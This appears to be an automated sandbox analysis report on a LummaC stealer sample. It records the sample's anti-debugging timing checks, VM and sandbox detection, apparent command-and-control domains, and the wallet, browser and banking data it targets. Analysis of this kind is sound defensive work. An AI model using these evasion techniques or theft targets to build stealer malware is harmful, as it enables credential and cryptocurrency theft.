              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190701 second address: 5180DA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov esi, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test esi, esi 0x0000000c jmp 00007F65E53D48C3h 0x00000011 je 00007F6655CE27EBh 0x00000017 xor eax, eax 0x00000019 jmp 00007F65E53ADFEAh 0x0000001e pop esi 0x0000001f pop edi 0x00000020 pop ebx 0x00000021 leave 0x00000022 retn 0004h 0x00000025 nop 0x00000026 cmp eax, 00000000h 0x00000029 setne cl 0x0000002c xor ebx, ebx 0x0000002e test cl, 00000001h 0x00000031 jne 00007F65E53D48B7h 0x00000033 jmp 00007F65E53D4A2Bh 0x00000038 call 00007F65E9B5E8CDh 0x0000003d mov edi, edi 0x0000003f jmp 00007F65E53D48BCh 0x00000044 xchg eax, ebp 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F65E53D48C7h 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5180DA0 second address: 5180DB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65E53D9524h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5180DB8 second address: 5180DBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5180DBC second address: 5180DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F65E53D951Dh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190B80 second address: 5190B86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190B86 second address: 5190B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190B8A second address: 5190B8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190B8E second address: 5190BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b call 00007F65E53D9525h 0x00000010 mov edx, esi 0x00000012 pop esi 0x00000013 pushfd 0x00000014 jmp 00007F65E53D951Dh 0x00000019 or cx, E606h 0x0000001e jmp 00007F65E53D9521h 0x00000023 popfd 0x00000024 popad 0x00000025 cmp dword ptr [75AF459Ch], 05h 0x0000002c pushad 0x0000002d push esi 0x0000002e pushad 0x0000002f popad 0x00000030 pop edi 0x00000031 push eax 0x00000032 push edx 0x00000033 mov ebx, esi 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190C9A second address: 5190CBA instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 0574871Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, ecx 0x0000000b popad 0x0000000c call 00007F6655CD9782h 0x00000011 push 75A92B70h 0x00000016 push dword ptr fs:[00000000h] 0x0000001d mov eax, dword ptr [esp+10h] 0x00000021 mov dword ptr [esp+10h], ebp 0x00000025 lea ebp, dword ptr [esp+10h] 0x00000029 sub esp, eax 0x0000002b push ebx 0x0000002c push esi 0x0000002d push edi 0x0000002e mov eax, dword ptr [75AF4538h] 0x00000033 xor dword ptr [ebp-04h], eax 0x00000036 xor eax, ebp 0x00000038 push eax 0x00000039 mov dword ptr [ebp-18h], esp 0x0000003c push dword ptr [ebp-08h] 0x0000003f mov eax, dword ptr [ebp-04h] 0x00000042 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000049 mov dword ptr [ebp-08h], eax 0x0000004c lea eax, dword ptr [ebp-10h] 0x0000004f mov dword ptr fs:[00000000h], eax 0x00000055 ret 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F65E53D48BDh 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190CBA second address: 5190CC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190CC0 second address: 5190CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190CC4 second address: 5190CC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190D5C second address: 5190DD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65E53D48C2h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test al, al 0x0000000d pushad 0x0000000e mov ebx, esi 0x00000010 call 00007F65E53D48BAh 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 popad 0x00000019 je 00007F6655CC84B4h 0x0000001f jmp 00007F65E53D48C7h 0x00000024 cmp dword ptr [ebp+08h], 00002000h 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e pushfd 0x0000002f jmp 00007F65E53D48C2h 0x00000034 and esi, 2BCA39F8h 0x0000003a jmp 00007F65E53D48BBh 0x0000003f popfd 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B0759 second address: 51B075F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B075F second address: 51B0781 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F65E53D48BCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov esi, ebx 0x00000016 mov di, 836Ch 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B0781 second address: 51B0787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B0787 second address: 51B078B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B078B second address: 51B07AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D951Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F65E53D951Ah 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B07AD second address: 51B07B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B07B3 second address: 51B07B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B07B9 second address: 51B07BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B07BD second address: 51B07E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B07E2 second address: 51B07E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B07E6 second address: 51B07EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B07EC second address: 51B07FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65E53D48BBh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B07FB second address: 51B080E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b mov ch, dl 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 movsx edx, cx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B080E second address: 51B081F instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B081F second address: 51B0825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B0825 second address: 51B0829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B0829 second address: 51B0887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+0Ch] 0x0000000b jmp 00007F65E53D9528h 0x00000010 test esi, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007F65E53D951Dh 0x0000001a pop ecx 0x0000001b pushfd 0x0000001c jmp 00007F65E53D9521h 0x00000021 xor ch, FFFFFFD6h 0x00000024 jmp 00007F65E53D9521h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B0887 second address: 51B08B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F6655CB23D1h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F65E53D48BDh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B08B1 second address: 51B08DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [75AF459Ch], 05h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F65E53D951Dh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B08DC second address: 51B08EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65E53D48BCh 0x00000009 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A1EBBC instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BF0F98 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 6104Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 4796Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\CEFJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolderJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior
              Source: file.exe, 00000000.00000002.2205471415.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: file.exe, 00000000.00000003.2107237440.0000000005C7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: file.exe, 00000000.00000003.2153873095.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154414134.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157239046.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156236448.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155720184.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157740634.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153539401.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154907137.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2206362809.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156790666.00000000013CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%
              Source: file.exe, file.exe, 00000000.00000003.2153873095.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154414134.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157239046.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156236448.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155720184.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157740634.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153539401.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154907137.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2206362809.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156790666.00000000013CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2107237440.0000000005C7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: file.exe, 00000000.00000002.2206362809.000000000136E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: file.exe, 00000000.00000002.2205471415.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: file.exe, 00000000.00000003.2107315122.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: file.exe, 00000000.00000003.2043171787.0000000004FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: scriptyprefej.store
              Source: file.exe, 00000000.00000003.2043171787.0000000004FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: navygenerayk.store
              Source: file.exe, 00000000.00000003.2043171787.0000000004FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: founpiuer.store
              Source: file.exe, 00000000.00000003.2043171787.0000000004FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: necklacedmny.store
              Source: file.exe, 00000000.00000003.2043171787.0000000004FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: thumbystriw.store
              Source: file.exe, 00000000.00000003.2043171787.0000000004FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: fadehairucw.store
              Source: file.exe, 00000000.00000003.2043171787.0000000004FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: crisiwarny.store
              Source: file.exe, 00000000.00000003.2043171787.0000000004FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: presticitpo.store
              Source: file.exe, 00000000.00000002.2205630594.0000000000BED000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: file.exe, 00000000.00000002.2206362809.00000000013C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 1532, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: file.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
              Source: file.exeString found in binary or memory: Wallets/ElectronCash
              Source: file.exeString found in binary or memory: window-state.json
              Source: file.exeString found in binary or memory: Jaxx Liberty
              Source: file.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: file.exeString found in binary or memory: Wallets/Exodus
              Source: file.exe, 00000000.00000003.2106682597.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
              Source: file.exe, 00000000.00000003.2082337916.0000000001437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum:
              Source: file.exeString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: file.exeString found in binary or memory: keystore
              Source: file.exe, 00000000.00000003.2082337916.0000000001437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live]
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
